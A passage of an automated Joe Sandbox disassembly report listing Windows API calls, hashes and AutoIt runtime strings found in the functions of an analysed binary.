                                                        • String ID: &Hl$csm
                                                        • API String ID: 1170836740-4116197483
                                                        • Opcode ID: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
                                                        • Instruction ID: 0d29d31292b4b29cb9f6e7581d01cb0436a767d86ae912dcaf92a35d2315130d
                                                        • Opcode Fuzzy Hash: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
                                                        • Instruction Fuzzy Hash: 8F417D34A0121AABCF10DF68C855FEEBBA6FF45324F14815DEC156B392D735AA058BD0
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0070C913
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
                                                        • Instruction ID: 5397dc70f6aeb85e6fe6bfdccfcf3bec69056bdb712c17351fd9099dda0895ba
                                                        • Opcode Fuzzy Hash: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
                                                        • Instruction Fuzzy Hash: 0B113D31699306FEE7069B549C83DAA37DCDF15314B50432EF904A62C2EB7CAD00526C
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$LocalTime
                                                        • String ID:
                                                        • API String ID: 952045576-0
                                                        • Opcode ID: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
                                                        • Instruction ID: f22307143735fd4b2f16dd9c98649b12660cd00f7627b35eb66948724ecfb1a6
                                                        • Opcode Fuzzy Hash: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
                                                        • Instruction Fuzzy Hash: C641B265D10118A5DB51EBB4C88AEEFB3A9EF05300F00896AF518E3162FB38D345C3E9
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006BF953
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF3D1
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF454
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
                                                        • Instruction ID: a8adc72360d65884a754bca8c39e32ccc1f5614dd7fced4218077cc905cd815a
                                                        • Opcode Fuzzy Hash: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
                                                        • Instruction Fuzzy Hash: C44127B1208684FAD739AB2C8C887FA7B93AF46310F14843CF18762771C636A8C1CB51
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00732D1B
                                                        • GetDC.USER32(00000000), ref: 00732D23
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00732D2E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00732D3A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00732D76
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00732D87
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00735A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00732DC2
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00732DE1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
                                                        • Instruction ID: 78f5528b231cea22f1daed53db4f97907a23b58769e11783f317945fc296fe3b
                                                        • Opcode Fuzzy Hash: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
                                                        • Instruction Fuzzy Hash: 81317F72211214BFFB154F50CC8AFEB3BA9EF09715F048055FE48AA292C6799C51C7A4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
                                                        • Instruction ID: ed8518851f9937a7f8cf0e73158f05d70b28eb6d072aabc40216d14ec0fcbfd0
                                                        • Opcode Fuzzy Hash: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
                                                        • Instruction Fuzzy Hash: 4421ADA1A40A05F7E31455218E52FBB33DDEF22784F440128FD099E5C2FB69DD108DB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: f235b1d555afbe387493f9bb6d9815f7d4b3a2aed0ed372a11a76db2bb026fda
                                                        • Instruction ID: be65074d9d011d5332834c9a3381afebb6b6310c2413ef7623a9d95b09fbb76b
                                                        • Opcode Fuzzy Hash: f235b1d555afbe387493f9bb6d9815f7d4b3a2aed0ed372a11a76db2bb026fda
                                                        • Instruction Fuzzy Hash: 2ED1C1B1A0061ADFDF10CFA8D885BAEB7B5FF48354F148069E915AB281E774DD41CBA0
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006E15CE
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1651
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006E17FB,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16E4
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16FB
                                                          • Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1777
                                                        • __freea.LIBCMT ref: 006E17A2
                                                        • __freea.LIBCMT ref: 006E17AE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                        • String ID:
                                                        • API String ID: 2829977744-0
                                                        • Opcode ID: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
                                                        • Instruction ID: 053613ba5cfd1afc2df840d98f663bdbc245760dc1cddd83b12b0a8d95f016c0
                                                        • Opcode Fuzzy Hash: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
                                                        • Instruction Fuzzy Hash: 3791C3B1E023969ADF208F66C851EEE7BB7AF46710F184659E801EF281D735CC41E760
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2610073882-625585964
                                                        • Opcode ID: b01ef45335f6698c9e51ddb95e6dad7938018a1886d16bc44d6c5486a48ef26f
                                                        • Instruction ID: 4cf698dd3b6620254701e5ce9f2517a139e1c297c23de639e96a39c7dc35b9e4
                                                        • Opcode Fuzzy Hash: b01ef45335f6698c9e51ddb95e6dad7938018a1886d16bc44d6c5486a48ef26f
                                                        • Instruction Fuzzy Hash: 6B918171A00229AFDF24CFA5DC44FAEBBB8EF46714F108559F515AB280D7789941CFA0
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0071125C
                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00711284
                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007112A8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007112D8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0071135F
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007113C4
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00711430
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                        • String ID:
                                                        • API String ID: 2550207440-0
                                                        • Opcode ID: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
                                                        • Instruction ID: 20c32ee22c62c093d157fcdc517d76fdd788cc21333e279b8b39031b0eb59e6a
                                                        • Opcode Fuzzy Hash: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
                                                        • Instruction Fuzzy Hash: E991E271A00219AFDB00DF98D885BFEB7B5FF45721F508029EA11EB2D1D778A981CB94
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
                                                        • Instruction ID: f1f73779abcdb90fa9237277cb0e0ef1bdf9e94e8bb647d57fe949b4803e9e43
                                                        • Opcode Fuzzy Hash: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
                                                        • Instruction Fuzzy Hash: 5F913BB1D40219EFCB15CFA9CC84AEEBBB9FF49320F148059E615B7251D374A982CB60
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0072396B
                                                        • CharUpperBuffW.USER32(?,?), ref: 00723A7A
                                                        • _wcslen.LIBCMT ref: 00723A8A
                                                        • VariantClear.OLEAUT32(?), ref: 00723C1F
                                                          • Part of subcall function 00710CDF: VariantInit.OLEAUT32(00000000), ref: 00710D1F
                                                          • Part of subcall function 00710CDF: VariantCopy.OLEAUT32(?,?), ref: 00710D28
                                                          • Part of subcall function 00710CDF: VariantClear.OLEAUT32(?), ref: 00710D34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4137639002-1221869570
                                                        • Opcode ID: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
                                                        • Instruction ID: 4b3fc35fff0fc3c59555560437e6400fe5faa93f1c9d424c32ed5b72e1484e55
                                                        • Opcode Fuzzy Hash: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
                                                        • Instruction Fuzzy Hash: AD9166746083119FC704EF24D48096AB7E5FF89314F14892EF88A9B351DB38EE45CB92
                                                        APIs
                                                          • Part of subcall function 0070000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
                                                          • Part of subcall function 0070000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
                                                          • Part of subcall function 0070000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
                                                          • Part of subcall function 0070000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00724C51
                                                        • _wcslen.LIBCMT ref: 00724D59
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00724DCF
                                                        • CoTaskMemFree.OLE32(?), ref: 00724DDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 614568839-2785691316
                                                        • Opcode ID: 547f1041f73ce51a6fd18302c8df6aa5989133515f82d2ac5afc0fec8fde8ec7
                                                        • Instruction ID: 2d972757bc61be8a74bc4331ec10abe0a83991ea254c3b8180d4324193865d4a
                                                        • Opcode Fuzzy Hash: 547f1041f73ce51a6fd18302c8df6aa5989133515f82d2ac5afc0fec8fde8ec7
                                                        • Instruction Fuzzy Hash: 2D910971D00229EFDF15DFA4D891AEEB7B9BF08310F10856AE915A7251DB385E44CFA0
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00732183
                                                        • GetMenuItemCount.USER32(00000000), ref: 007321B5
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007321DD
                                                        • _wcslen.LIBCMT ref: 00732213
                                                        • GetMenuItemID.USER32(?,?), ref: 0073224D
                                                        • GetSubMenu.USER32(?,?), ref: 0073225B
                                                          • Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
                                                          • Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
                                                          • Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007322E3
                                                          • Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 4196846111-0
                                                        • Opcode ID: a3329cdc2be7868389b741cd726009c1e7395cb6da454fd73198aa7247703885
                                                        • Instruction ID: 48a4ffd9677a205a698f53098e47c5e565d72c94340dd1854a8564764a8b04ca
                                                        • Opcode Fuzzy Hash: a3329cdc2be7868389b741cd726009c1e7395cb6da454fd73198aa7247703885
                                                        • Instruction Fuzzy Hash: D7717E75A00215AFDB50EF64C845AAEB7F6FF48320F158459E816EB352DB38ED428B90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 0070AEF9
                                                        • GetKeyboardState.USER32(?), ref: 0070AF0E
                                                        • SetKeyboardState.USER32(?), ref: 0070AF6F
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0070AF9D
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0070AFBC
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0070AFFD
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0070B020
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
                                                        • Instruction ID: 5af64caa691d1c780f31e34b272149469f4f245caaf63240a0c6be01b7eabebf
                                                        • Opcode Fuzzy Hash: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
                                                        • Instruction Fuzzy Hash: 2051A2A0A047D6BDFB368334C84ABBA7EE95B06304F088689E1D9954C2D3DDE9C4D751
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 0070AD19
                                                        • GetKeyboardState.USER32(?), ref: 0070AD2E
                                                        • SetKeyboardState.USER32(?), ref: 0070AD8F
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0070ADBB
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0070ADD8
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0070AE17
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0070AE38
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
                                                        • Instruction ID: 345acf2d2f74b8651942f5a3dc7ab91e1c2cd0cc49bfa87746b1b1390eda0b59
                                                        • Opcode Fuzzy Hash: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
                                                        • Instruction Fuzzy Hash: 4451F7A16047D5BDFB338334CC56B7A7ED86B46300F088689E1D5968C3D29CEC84D752
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(006E3CD6,?,?,?,?,?,?,?,?,006D5BA3,?,?,006E3CD6,?,?), ref: 006D5470
                                                        • __fassign.LIBCMT ref: 006D54EB
                                                        • __fassign.LIBCMT ref: 006D5506
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,006E3CD6,00000005,00000000,00000000), ref: 006D552C
                                                        • WriteFile.KERNEL32(?,006E3CD6,00000000,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D554B
                                                        • WriteFile.KERNEL32(?,?,00000001,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D5584
                                                        Memory Dump Source
